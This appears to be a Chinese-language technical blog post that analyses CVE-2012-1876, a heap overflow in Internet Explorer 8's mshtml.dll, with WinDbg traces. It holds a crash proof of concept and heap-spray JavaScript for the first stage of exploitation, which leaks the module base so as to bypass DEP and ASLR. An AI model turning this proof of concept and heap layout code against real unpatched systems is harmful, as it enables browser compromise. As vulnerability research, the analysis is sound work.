CVE-2012-1876 Internet Exporter堆溢出漏洞分析

漏洞描述

该IE浏览器漏洞的成因在mshtml.dll这个模块的CTableLayout::CalculateMinMax函数里,程序在执行时会以HTML代码中的元素span属性作为循环控制次数向堆中写入数据。如果此span值设置不当,那么就会引发堆溢出问题。

IE浏览器组件介绍

Internet Explorer体系结构的关键是使用组件对象模型(COM),它控制所有的组件的交互,并实现组件的重用和扩展性。下图说明了Internet Explorer的主要组件。
在这里插入图片描述

  • IExplore.exe位于顶层,是IExplore.exe的可执行文件,依赖于Internet Explorer的其他组件来完成渲染 导航 协议实现等工作
  • Browseui.dll提供Internet Explorer的用户界面,此dll包括Internet Explorer地址栏 状态栏 菜单栏等
  • Shdocvw.dll提供导航和历史等功能,此dll公开ActiveX控件接口
  • Mshtml.dll是Internet Explorer的核心,它负责HTML和CSS解析
  • Urlmon.dll提供MIME处理和代码下载功能
  • WinInet.dll是Windows Internet协议处理程序。它实现了HTTP和FTP协议及缓存管理

分析环境

环境 版本
虚拟机 Win7 x86
IE浏览器 8.0
调试器 windbg

POC

<html>
<body>
    <table style="table-layout:fixed" >
        <col id="132" width="41" span="6" >&nbsp </col>
    </table>

    <script>

    function over_trigger() {
        var obj_col = document.getElementById("132");
        obj_col.width = "42765";
        obj_col.span = 666;
    }

    setTimeout("over_trigger();",1);

    </script>
</body>
</html>

上述代码的功能比较清晰,最开始创建时span属性值为6,而后通过js中的over_trigger函数将其动态更新为666(这个值可以是任意的 只要能保证溢出就行)

漏洞分析

将poc保存为html文件并双击打开,会弹出阻止提示,此时用windbg附加IE进程

在这里插入图片描述

附加列表中会有两个IE进程,选择后一个,即当前选项卡对应的子进程,接着我们设置如下几个断点

0:012> bp mshtml!CTableLayout::CalculateMinMax
0:012> bp mshtml!_HeapRealloc
0:012> bp mshtml!CTableCol::GetAAspan

漏洞成因是在CTableLayout::CalculateMinMax这个函数中,所以这个地方肯定要下个断点,又因为是堆溢出,所以在_HeapRealloc函数也来个断点。最后CTableCol::GetAAspan函数是用来获取Span属性值的。

0:012> bd 1 2
0:012> bl
 0 e 6bcca078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 d 6bd7d7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 d 6bc4a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan

接着我们暂时禁用掉1和2两个断点,输入g命令运行,在IE中允许阻止的内容,弹出警告直接点击确定

在这里插入图片描述

0:012> g
ModLoad: 6bb30000 6bbe2000   C:\Windows\System32\jscript.dll
Breakpoint 0 hit
eax=ffffffff ebx=004899c0 ecx=00412802 edx=ffffffff esi=00000000 edi=0245c334
eip=6891a078 esp=0245c0d8 ebp=0245c2f0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
6891a078 8bff            mov     edi,edi

回到windbg可以看到程序第一次在CTableLayout::CalculateMinMax函数入口断了下来,这是处理最开始创建时span值为6的情况

0:005> kb
ChildEBP RetAddr  Args to Child              
0245c0d4 6891a6b8 004899c0 0245c368 00000000 mshtml!CTableLayout::CalculateMinMax
0245c2f0 68910879 0245c368 0245c334 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0245c49c 68a1566c 0245d3b8 0245c6c8 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0245c5d4 68a118f9 004899c0 00000000 00000000 mshtml!CLayout::CalcSize+0x2b8
......

接着查看调用堆栈和CTableLayout::CalculateMinMax函数声明

void __thiscall CTableLayout::CalculateMinMax(CTableLayout *theTableLayoutObj, LPVOID lpUnknownStackBuffer);

我们主要关心CTableLayout *theTableLayoutObj这个变量,它是一个指针,由上面的kb命令可知其值为004899c0

在这里插入图片描述

接着 查看一下004899c0的内容,68819aa0为vftable的值,00000006为span属性的值,最右边的0为申请的堆空间的起始地址,目前还没分配所以为NULL

0:005> be 1 2
0:005> bl
 0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan

接着启用1和2号断点

0:005> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=000000a8 edx=00000000 esi=00489a5c edi=00489a50
eip=689cd7a5 esp=0245c00c ebp=0245c024 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!_HeapRealloc:
689cd7a5 8bff            mov     edi,edi

输入g命令运行,程序断在mshtml!_HeapRealloc函数开头。

程序申请了堆空间用于保存column的样式信息,每个样式信息占0x1C个字节,有多少个样式信息由span属性值来决定。

由于poc中span属性值为6,因此这里申请的堆空间的大小为0x1C*6=0xA8,即_HeapRealloc函数断下后ecx寄存器的值

0:005> gu
eax=00000000 ebx=00000000 ecx=775a5dd3 edx=004b6657 esi=00489a5c edi=00489a50
eip=689e34e2 esp=0245c014 ebp=0245c024 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CImplAry::EnsureSizeWorker+0xa1:
689e34e2 8bd8            mov     ebx,eax

接着执行gu命令执行到返回,_HeapRealloc函数执行完成之后,再查看CTableLayout *theTableLayoutObj这个变量的值

0:005> dd 004899c0 L30
004899c0  68819960 00464528 00439648 689ce3b8
004899d0  00000001 00000000 0108080d ffffffff
004899e0  00000000 00000000 00000000 ffffffff
004899f0  00017700 0000b478 00000000 00000000
00489a00  00000000 00412802 00000000 00000000
00489a10  00000000 00000006 00000000 ffffffff
00489a20  00000000 ffffffff 6881a594 00000004
00489a30  00000004 00475ed8 6881a594 00000018
00489a40  00000006 004a3660 00000000 00000000
00489a50  6881a594 00000000 00000000 004b6658
00489a60  00000000 00000000 00000000 00000000
00489a70  00000000 00000000 00000000 00000000

发现此时原来堆空间的起始地址由NULL变成了004b6658了

0:005> g
Breakpoint 2 hit
eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88
eip=6889a6cb esp=0245c02c ebp=0245c0d4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableCol::GetAAspan:
6889a6cb 8bff            mov     edi,edi
0:005> gu
eax=00000006 ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88
eip=68aaf31f esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
68aaf31f 3de8030000      cmp     eax,3E8h

继续运行程序会在CTableCol::GetAAspan处断下来,也就是获取span值作为写入样式信息时循环的控制次数,函数结果保存在eax中,此时eax的值为6

0:005> ba w1 004b6658
0:005> bl
 0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
 3 e 004b6658 w 1 0001 (0001)  0:**** 
0:005> g
Breakpoint 3 hit
eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670
eip=68c40a49 esp=0245c014 ebp=0245c01c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x2f:
68c40a49 eb2a            jmp     mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)

再来看下程序向申请的堆空间写入样式信息的过程,我们在堆空间的起始地址下断,接着输入g命令运行,断点断下。

从poc中可以看到此时对应的width属性值为41,004899c0处写入的内容就为width值41*100=0x00001004,也就是断点断下时候ebx的值。当断点断下时0x1C个字节的信息都已写入完成,我们再单步往下跟一下

0:005> p
eax=00010048 ebx=00001004 ecx=004b6670 edx=00000010 esi=004b6658 edi=004b6670
eip=68c40a75 esp=0245c014 ebp=0245c01c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x5b:
68c40a75 5f              pop     edi
......
0:005> 
eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf47a esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableLayout::CalculateMinMax+0x558:
68aaf47a ff45ec          inc     dword ptr [ebp-14h]  ss:0023:0245c0c0=00000000
0:005> 
eax=00010048 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf47d esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55b:
68aaf47d 8b45ec          mov     eax,dword ptr [ebp-14h] ss:0023:0245c0c0=00000001
0:005> 
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf480 esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55e:
68aaf480 8345dc1c        add     dword ptr [ebp-24h],1Ch ss:0023:0245c0b0=00000000
0:005> 
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00000010 esi=004b6658 edi=00000001
eip=68aaf484 esp=0245c030 ebp=0245c0d4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x562:
68aaf484 3b4510          cmp     eax,dword ptr [ebp+10h] ss:0023:0245c0e4=00000006

可以看到出现了inc+cmp的组合,可以猜想这应该就是控制堆空间写入样式信息的循环了。

这几条汇编指令的意思就是[ebp-14h]的值每次增加1,即每次循环后递增,[ebp-24h]对应的值每次加0x1C,即每次加一个样式信息的字节数,最后当前的循环次数和[ebp+10h]对应的值比较

0:005> dd [ebp+10h] L1
0245c0e4  00000006

[ebp+10h]是span的属性值。接下来我们来看下通过js脚本动态更新span属性值后,也就是span值变成666时程序第二次在CTableLayout::CalculateMinMax函数入口断下后是个什么情形,理论上是要重新分配空间的,毕竟要多写入660个样式信息,而后再获取此时span的值作为循环控制次数,最后才向堆空间写入样式信息。

我们来到程序此时断下来的地方,顺便看下之前确实是写入了6个样式信息

0:005> bd 1 2 3 
0:005> bl
 0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 d 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 d 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
 3 d 004b6658 w 1 0001 (0001)  0:**** 
0:005> g
Breakpoint 0 hit
eax=ffffffff ebx=004899c0 ecx=00402c02 edx=ffffffff esi=00000000 edi=0245bb4c
eip=6891a078 esp=0245b8f0 ebp=0245bb08 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
6891a078 8bff            mov     edi,edi
0:005> kb L3
ChildEBP RetAddr  Args to Child              
0245b8ec 6891a6b8 004899c0 0245bb80 00000000 mshtml!CTableLayout::CalculateMinMax
0245bb08 68910879 0245bb80 0245bb4c 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0245bcb4 68a1566c 0245d328 0245bee0 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0:005> dd 004899c0 L30
004899c0  68819960 00464528 00439648 689ce3b8
004899d0  00000001 00000000 010a081d 00002580
004899e0  00000000 00000000 0041da18 ffffffff
004899f0  00017700 0000b478 00000708 00000001
00489a00  00000000 00402c02 00000000 00000000
00489a10  00000000 00000006 ffffffff ffffffff
00489a20  ffffffff ffffffff 6881a594 00000004
00489a30  00000004 00475ed8 6881a594 00000018
00489a40  00000006 004a3660 00000000 00000000
00489a50  6881a594 00000018 00000006 004b6658
00489a60  00000000 00000000 00000000 00000000
00489a70  00000000 00000000 00000000 00000000

继续往下应该是要分配堆空间了,启用_HeapRealloc断点,g命令运行

0:005> be 1 2
0:005> bl
 0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 e 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 e 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
 3 d 004b6658 w 1 0001 (0001)  0:**** 
0:005> g
Breakpoint 2 hit
eax=00460a88 ebx=004899c0 ecx=00000034 edx=00000006 esi=004b6700 edi=00460a88
eip=6889a6cb esp=0245b844 ebp=0245b8ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableCol::GetAAspan:
6889a6cb 8bff            mov     edi,edi
0:005> gu
eax=0000029a ebx=004899c0 ecx=00000002 edx=004312a8 esi=004b6700 edi=00460a88
eip=68aaf31f esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
68aaf31f 3de8030000      cmp     eax,3E8h

但我们却发现程序跳过了堆空间的分配过程,错误的认为之前分配的空间已经足够而转去直接获取控制循环次数的span属性值eax,CTableCol::GetAAspan函数执行完时eax的值为0x29a,即十进制的666

接下来和前面一样是写入样式信息的过程,不过这次是对只能容纳6个样式信息的堆空间写入了666个样式信息,从而引发了堆溢出

0:005> be 3
0:005> bd 1 2 
0:005> bl
 0 e 6891a078     0001 (0001)  0:**** mshtml!CTableLayout::CalculateMinMax
 1 d 689cd7a5     0001 (0001)  0:**** mshtml!_HeapRealloc
 2 d 6889a6cb     0001 (0001)  0:**** mshtml!CTableCol::GetAAspan
 3 e 004b6658 w 1 0001 (0001)  0:**** 
0:005> g
Breakpoint 3 hit
eax=04141148 ebx=00414114 ecx=004b6670 edx=00004141 esi=004b6658 edi=004b6670
eip=68c40a49 esp=0245b82c ebp=0245b834 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableColCalc::AdjustForCol+0x2f:
68c40a49 eb2a            jmp     mshtml!CTableColCalc::AdjustForCol+0x5b (68c40a75)

我们启用堆空间的断点,让断点在堆空间写入的时候断下,接着一直单步

0:005> 
eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf47a esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CTableLayout::CalculateMinMax+0x558:
68aaf47a ff45ec          inc     dword ptr [ebp-14h]  ss:0023:0245b8d8=00000000
0:005> 
eax=04141148 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf47d esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55b:
68aaf47d 8b45ec          mov     eax,dword ptr [ebp-14h] ss:0023:0245b8d8=00000001
0:005> 
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf480 esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x55e:
68aaf480 8345dc1c        add     dword ptr [ebp-24h],1Ch ss:0023:0245b8c8=00000000
0:005> 
eax=00000001 ebx=004899c0 ecx=004b6670 edx=00004141 esi=004b6658 edi=00000001
eip=68aaf484 esp=0245b848 ebp=0245b8ec iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x562:
68aaf484 3b4510          cmp     eax,dword ptr [ebp+10h] ss:0023:0245b8fc=0000029a

接着查看ebp+10h的值

0:005> dd ebp+10h L1
0245b8fc  0000029a

可以看到ebp-0x10对应此时span属性值为0x29a,所以程序最终将会执行666次循环,堆溢出发生后程序将继续运行,从而造成内存访问违规,导致IE浏览器崩溃

总结:

  1. 程序根据span的属性值申请堆空间
  2. 获取span的属性值并循环向堆空间写入样式信息
  3. 通过js脚本动态更新span属性值
  4. 此时程序跳过分配堆空间的过程 错误的认为之前分配的空间已经足够 转而去直接获取控制循环次数的span属性值
  5. 向堆空间写入样式信息 引发堆溢出 导致浏览器崩溃

漏洞利用

要利用堆溢出漏洞,需要先确定溢出时用于覆盖的内容和位置。为了绕过DEP和ASLR的保护,VUPEN通过溢出漏洞覆盖BSTR字符串长度的值,然后通过JavaScript读取CButtonLayout虚表指针,通过固定偏移量找到mshtml.dll基址,用它来构造ROP指令,以此绕过DEP和ASLR

为了绕过DEP和ASLR,首先需要构造堆布局以便将mshtml.dll基址泄露出来,下面的代码就是用于构造堆布局的

<div id="test"></div>
        <script language='javascript'>
 
        var leak_index = -1;
 
        var dap = "EEEE";
        while ( dap.length < 480 ) dap += dap;
 
        var padding = "AAAA";
        while ( padding.length < 480 ) padding += padding;
 
        var filler = "BBBB";
        while ( filler.length < 480 ) filler += filler;
 
        //spray
        var arr = new Array();
        var rra = new Array();
 
        var div_container = document.getElementById("test");
        div_container.style.cssText = "display:none";
 
        for (var i=0; i < 500; i+=2) {
 
            // E
            rra[i] = dap.substring(0, (0x100-6)/2);
 
            // S, bstr = A
            arr[i] = padding.substring(0, (0x100-6)/2);
 
            // A, bstr = B
            arr[i+1] = filler.substring(0, (0x100-6)/2);
 
            // B
            var obj = document.createElement("button");
            div_container.appendChild(obj);
 
        }
 
        for (var i=200; i<500; i+=2 ) {
            rra[i] = null;
            CollectGarbage();
        }
 
        </script>

上面的JavaScript代码首先创建0x100大小的字符串"EEEE",接着是同等大小的"AAAA"和"BBBB",最后又创建了一个button元素,即CButtonLayout对象结构。

上面的字符串在IE浏览器中都是一段BSTR字符串,即Basic String的简称,它是包含长度前缀和NULL终止符的Unicode字符串,所以字符数是字节数的一半,这也是前面代码分配字符串除以2的原因。

接着,再从rra数组中间位置开始间隔释放内存,腾出空间后供后面分配0x100大小的对象时能够被占用到。

最后,构造出来的堆空间布局如下:

[外链图片转存失败(img-Jj8bWphb-1565927056165)(assets/1565860060218.png)]

释放的位置就是为了在分配漏洞堆块vulheap时能够占用到这些释放位置中的一个,当溢出时就可以覆盖到后面的AAAA和BBBB了。

<table style="table-layout:fixed" ><col id="0" width="41" span="9" >&nbsp </col></table>
<table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp </col></table>
<table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp </col></table>
<table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp </col></table>

接下来,创建一连串的col元素,共132个以占用前面释放的"EEEE"位置

为了确定所分配的vulheap是否占用到已释放的"EEEE"位置,我们先在释放内存的函数CollectGarbage上下断点,它对应的是jscript.dll中的JsCollectGarbage。

[外链图片转存失败(img-snGZd9hA-1565927056166)(assets/1565921432705.png)]

先通过Windbg加载IE进程

0:012> .childdbg 1
Processes created by the current process will be debugged

并执行.childdbg开启子进程调试

0:012> sxe ld:jscript

因为刚开始IE还没有加载jscript.dll,所以先设置加载jscript.dll时断下

0:012> g
ModLoad: 6be10000 6bec2000   C:\Windows\System32\jscript.dll
eax=00000000 ebx=00000000 ecx=00000074 edx=004c0e94 esi=7ffd9000 edi=022ac19c
eip=775970b4 esp=022ac0b4 ebp=022ac108 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
775970b4 c3              ret

接着输入g命令,点击运行阻止的风险,此时程序断在jscript.dll

0:005> bp jscript!JsCollectGarbage

断下后再对JsCollectGarbage函数下断。因为释放堆块最后都会调用到底层函数ntdll!RtlFreeHeap,所以它的第三个参数即为被释放的堆地址,我们可以对其下断,然后记录并输出每个释放的堆块地址。

0:005> bd 0
0:005> bl
 0 d 6be983d3     0001 (0001)  0:**** jscript!JsCollectGarbage
 0:005> bu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"

下断前可以先把JsCollectGarbage断点禁掉,避免程序多次被中断

分配vulheap堆块的行为是CTableLayout::CalculateMinMa中调用CImplAry::EnsureSizeWorker函数分配的,并且分配的地址保存在[ebx+9c]中,调用完CImplAry::EnsureSizeWorker函数的下一条指令位于mshtml!CTableLayout::CalculateMinMax+0x16d,可以如此下断得到vulheap地址:

0:005> bu mshtml!CTableLayout::CalculateMinMax+0x16d ".echo vulheap;dd poi(ebx+9c) l4;g"

由于日志输出信息比较多,可以将日志保存在文档中

0:005> .logopen c:\log.txt
Opened log file 'c:\log.txt'

记录完毕可以使用.logclose关闭

0:005> .logclose
Closing open log file c:\log.txt

保存之后,最后一个vueheap就是我们要的’

free heap
083f2ef0  e8 d2 56 69 00 0d 4c 00-d0 62 83 04 38 04 4c 00  ..Vi..L..b..8.L.
free heap
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
free heap
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
free heap
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
(3f4.c0): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000009 ebx=083f5d20 ecx=00000000 edx=00000009 esi=022ac580 edi=00000000
eip=694ba1b2 esp=020b3000 ebp=022ac2ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CTableLayout::CalculateMinMax+0x175:
694ba1b2 50              push    eax

另外为了确定虚表偏移,直接动态找一下吧

0:005> x mshtml!CButtonLayout::*
6956f069          mshtml!CButtonLayout::GetThemeClassId (<no parameter info>)
695ee9c5          mshtml!CButtonLayout::GetInsets (<no parameter info>)
69508690          mshtml!CButtonLayout::`vftable' = <no type information>
6959cf35          mshtml!CButtonLayout::GetAutoSize (<no parameter info>)
69785a7c          mshtml!CButtonLayout::HitTestContent (<no parameter info>)
6955d2e3          mshtml!CButtonLayout::DrawClientBackground (<no parameter info>)
69509211          mshtml!CButtonLayout::Init (<no parameter info>)
6959cf35          mshtml!CButtonLayout::GetMultiLine (<no parameter info>)
696f1080          mshtml!CButtonLayout::s_layoutdesc = <no type information>
69785a6c          mshtml!CButtonLayout::GetBtnHelper (<no parameter info>)
697858a7          mshtml!CButtonLayout::GetFocusShape (<no parameter info>)
696f1079          mshtml!CButtonLayout::GetLayoutDesc (<no parameter info>)
69785a07          mshtml!CButtonLayout::DoLayout (<no parameter info>)
6956f069          mshtml!CButtonLayout::GetWordWrap (<no parameter info>)
695084f8          mshtml!CButtonLayout::`vftable' = <no type information>
6955d2af          mshtml!CButtonLayout::DrawClient (<no parameter info>)
695d36c1          mshtml!CButtonLayout::`scalar deleting destructor' (<no parameter info>)
697856e7          mshtml!CButtonLayout::DrawClientBorder (<no parameter info>)
695d36c1          mshtml!CButtonLayout::`vector deleting destructor' (<no parameter info>)
695eeb59          mshtml!CButtonLayout::GetDefaultSize (<no parameter info>)

奇怪的是,有两个虚表,这里我也不知道为什么……

此外看一下vulheap

1:026> db 03f2ae30 l101c
03f2ae30  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2ae40  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2ae50  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2ae60  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2ae70  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2ae80  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2ae90  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2aea0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2aeb0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2aec0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2aed0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2aee0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2aef0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2af00  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2af10  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2af20  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2af30  04 10 00 00 04 10 00 00-0c 61 81 04 00 00 00 00  .........a......
03f2af40  02 00 00 00 48 00 01 00-04 10 00 00 04 10 00 00  ....H...........
03f2af50  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2af60  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2af70  41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00  A.A.A.A.A.A.H...
03f2af80  04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00  ............A.A.
03f2af90  41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00  A.A.A.A.H.......
03f2afa0  04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00  ........A.A.A.A.
03f2afb0  41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00  A.A.H...........
03f2afc0  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2afd0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2afe0  41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00  A.A.A.A.A.A.H...
03f2aff0  04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00  ............A.A.
03f2b000  41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00  A.A.A.A.H.......
03f2b010  04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00  ........A.A.A.A.
03f2b020  41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00  A.A.H...........
03f2b030  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2b040  48 00 01 00 41 00 00 00-20 10 d1 01 00 00 00 c2  H...A... .......
03f2b050  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b060  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b070  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b080  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b090  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0c0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b100  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b110  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b120  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b130  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b140  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b150  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2b160  05 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  .........j......
03f2b170  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2b180  70 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  p....<.h........
03f2b190  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2b1a0  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2b1b0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
